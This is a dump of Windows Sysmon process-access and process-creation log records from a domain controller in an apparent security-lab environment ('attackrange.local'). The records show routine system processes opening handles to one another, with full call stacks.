13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.336{59A5CD1D-8E46-6005-0F00-00000000A301}11161260C:\Windows\System32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+1982c|c:\windows\system32\termsrv.dll+2320b|c:\windows\system32\termsrv.dll+22643|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 154100x800000000000000010102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.333{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 10341000x800000000000000010101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E56-6005-2800-00000000A301}26964316C:\Windows\System32\spoolsv.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1b0d3|C:\Windows\System32\spoolsv.exe+1af39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bfb|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
